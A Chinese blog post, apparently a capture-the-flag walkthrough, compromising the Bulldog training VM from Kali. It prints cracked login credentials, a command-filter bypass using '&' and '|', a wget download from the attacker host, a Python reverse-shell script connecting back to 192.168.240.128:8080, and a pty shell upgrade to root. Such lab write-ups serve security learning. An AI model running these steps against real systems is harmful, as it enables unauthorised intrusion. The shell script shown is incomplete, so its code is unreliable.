IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 渗透测试实战-bulldog -> 正文阅读

[系统运维]渗透测试实战-bulldog


环境准备

  • kali 当成攻击机
  • bulldog靶机
    官网下载地址
    Vmware装入即可,成功后是显示这个样子
    在这里插入图片描述
  • kali ip 是:192.168.240.128

信息收集

使用nmap 扫一下靶机处于的网段情况
使用

nmap -sn 只进行主机发现,不进行端口扫描
nmap -Pn 并进行端口扫描

  • 已知对方网段在192.168.240.中
  • 所以nmap扫一下即可
    在这里插入图片描述

漏洞利用

可以看到开放了80端口我们访问一下
在这里插入图片描述

我们就可以利用常规漏洞(sql注入xss等等)
我们首先想到的就是目录扫描了,看看能给我们带来什么惊喜

  • 这里用的是dirsearch

  • 果然惊喜一大堆,首先就能看到后台了
    在这里插入图片描述

  • 万能密码,弱口令无果

在这里插入图片描述
尝试访问dev 发现有东西,查看源码得到
在这里插入图片描述
信息收集了一波尝试访问发现需要账号认证
在这里插入图片描述
首先破解md5,

推荐网站https://www.somd5.com/

经尝试只有最后两个解得出来
在这里插入图片描述
在这里插入图片描述

nick@bulldogindustries.com   bulldog
sarah@bulldogindustries.com  bulldoglover

尝试登入
在这里插入图片描述
登入成功.尝试访问那个shell网站

在这里插入图片描述
发现可以执行命令 ,所以后门要做的就是进一步获取shell

后期利用

思路一

在这里插入图片描述
首先发现直接执行命令会被检测,这里我们利用&绕过

  • 当然也可以用 |

我们尝试用weget 来进行测试

首先启动 service apache2 start
然后监听1234端口让其访问
然后pwd | weget http://192.168.240.128/12.html

操作如图
在这里插入图片描述
发现可以进行访问
当然也可以

python -m SimpleHTTPServer 80 来创建简单的服务访问即可

既然weget 能访问,那末我们直接远程下载python 恶意脚本即可 首先创建 pay.py内容为


import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.240.128",8080))
os.dup2(s.fileno(),0)       
os.dup2(s.fileno(),1)       
os.dup2(s.fileno(),2)       

具体shell 如何创建,可以评论区留言下棋更新其用法
weget 下载后执行即可
在这里插入图片描述
直接弹回shell 成功

后期利用

在home中查看用户
在这里插入图片描述
ls 无回显,ls -a 查看所有
在这里插入图片描述
访问它
在这里插入图片描述
strings 显示文件内容找到密码
在这里插入图片描述

利用 python -c 'import pty;pty.spawn("/etc/bash")'

进行提取操作
在这里插入图片描述
拿到root权限

总结

  • 就是前期的漏洞收集一定要做好,这个靶机漏洞很明显所以渗漏思路很简单,还有很多的拿shell操作没有学,今天学到了 weget 下可以远程下载 shell至于 是python shell不是bash 呢,我试了试是因为,检测到了字符然后失败,所以利用python socket 进行弹shell.
  • 还要继续学本领,
  • 今天就到这里了,明天继续加油
  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-01-29 23:28:17  更:2022-01-29 23:28:38 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 8:32:10-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码